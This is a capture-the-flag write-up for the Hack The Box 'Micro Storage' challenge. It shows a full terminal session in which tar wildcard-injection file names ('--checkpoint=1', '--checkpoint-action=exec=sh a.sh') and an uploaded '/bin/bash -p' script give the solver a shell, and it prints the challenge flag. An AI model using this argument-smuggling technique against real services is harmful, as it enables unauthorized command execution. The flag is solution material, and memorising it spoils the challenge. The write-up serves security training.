मुख्य कंटेंट तक स्किप करें

Micro Storage

Some group of people seem to have made a network service that lets you store files temporarily. But little did they know about the mistake they made coding their script... Try to get familiar with their service and discover the vulnerability behind it. Your goal is to leak the contents of /𝗳𝗹𝗮𝗴.𝘁𝘅𝘁.

given network service: nc ip port

Solution

This WriteUp Solution is password protected by the flag of the challenge.
g2020ucp1821@cloudshell:~ (seproject-365714)$ nc 188.166.175.0 32338
.-------------------------------------------------------------------------------------.
| ___ ____ _____ _ __ _____ |
| | \/ (_) / ___| | / | | _ | |
| | . . |_ ___ _ __ ___ \ `--.| |_ ___ _ __ __ _ __ _ ___ __ __`| | | |/' | |
| | |\/| | |/ __| '__/ _ \ `--. \ __/ _ \| '__/ _` |/ _` |/ _ \ \ \ / / | | | /| | |
| | | | | | (__| | | (_) | /\__/ / || (_) | | | (_| | (_| | __/ \ V / _| |_\ |_/ / |
| \_| |_/_|\___|_| \___/ \____/ \__\___/|_| \__,_|\__, |\___| \_/ \___(_)___/ |
| B y H a c k T h e B o x L a b s __/ | |
| |___/ |
`-----------------------. .-------------------------'
| Welcome to your online temporary |
| Micro Storage |
`-----------------------------------'

\!/ WARNING \!/
Your storage only lasts during the ongoing session, once the session killed, all
your files will be gone. Use this service responsibly.
---------o---------

1 => Upload a new file (10 file(s) remaining)
2 => List your uploaded files (0 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 1
[*] Enter your file name: a.sh
[*] Start typing your file content: (send 'EOF' when done)
#!/bin/bash
/bin/bash -p
EOF
[+] Your file "a.sh" has been saved. (25 bytes written)
1 => Upload a new file (9 file(s) remaining)
2 => List your uploaded files (1 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 1
[*] Enter your file name: --checkpoint=1
[*] Start typing your file content: (send 'EOF' when done)

EOF
[+] Your file "--checkpoint=1" has been saved. (0 bytes written)
1 => Upload a new file (8 file(s) remaining)
2 => List your uploaded files (2 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 1
[*] Enter your file name: --checkpoint-action=exec=sh a.sh
[-] File name is too long.
1 => Upload a new file (8 file(s) remaining)
2 => List your uploaded files (2 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 1
[*] Enter your file name: --checkpoint-action=exec=sh a.sh
[*] Start typing your file content: (send 'EOF' when done)
EOF
[+] Your file "--checkpoint-action=exec=sh a.sh" has been saved. (0 bytes written)
1 => Upload a new file (7 file(s) remaining)
2 => List your uploaded files (3 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 5
ls
--checkpoint-action=exec=sh a.sh
--checkpoint=1
a.sh
archive.tar
whoami
storage
ls
--checkpoint-action=exec=sh a.sh
--checkpoint=1
a.sh
archive.tar
ls -la
total 12
-rw-r--r-- 1 storage storage 0 Apr 12 13:26 --checkpoint-action=exec=sh a.sh
-rw-r--r-- 1 storage storage 0 Apr 12 13:24 --checkpoint=1
drwxrwxrwx 2 storage storage 4096 Apr 12 13:26 .
drwxr-x-wx 1 root root 4096 Apr 12 13:22 ..
-rw-r--r-- 1 storage storage 25 Apr 12 13:23 a.sh
-rw-r--r-- 1 storage storage 0 Apr 12 13:26 archive.tar
cd /
ls -la
total 80
drwxr-xr-x 1 root root 4096 Apr 12 12:55 .
drwxr-xr-x 1 root root 4096 Apr 12 12:55 ..
drwxr-xr-x 2 root root 4096 May 12 2021 bin
drwxr-xr-x 2 root root 4096 Apr 24 2018 boot
drwxr-xr-x 5 root root 360 Apr 12 12:55 dev
drwxr-xr-x 1 root root 4096 Sep 14 2021 etc
-r--r--r-- 1 root root 67 Jul 10 2020 flag.txt
drwxr-xr-x 1 root root 4096 Sep 14 2021 home
drwxr-xr-x 1 root root 4096 Sep 14 2021 lib
drwxr-xr-x 2 root root 4096 May 12 2021 lib64
drwxr-xr-x 2 root root 4096 May 12 2021 media
drwxr-xr-x 2 root root 4096 May 12 2021 mnt
drwxr-xr-x 2 root root 4096 May 12 2021 opt
dr-xr-xr-x 619 root root 0 Apr 12 12:55 proc
drwx------ 1 root root 4096 Sep 14 2021 root
drwxr-xr-x 1 root root 4096 May 19 2021 run
drwxr-xr-x 1 root root 4096 May 19 2021 sbin
drwxr-xr-x 2 root root 4096 May 12 2021 srv
dr-xr-xr-x 13 root root 0 Apr 12 12:55 sys
drwxrwxrwt 1 root root 4096 Sep 14 2021 tmp
drwxr-xr-x 1 root root 4096 May 12 2021 usr
drwxr-xr-x 1 root root 4096 May 12 2021 var
cat flag.txt
HTB{@bus1Ng_gTf0_b1N$_c4n_b3_fUn_s0m3t1meS__r1g|-|t??!!__c4fdecf8}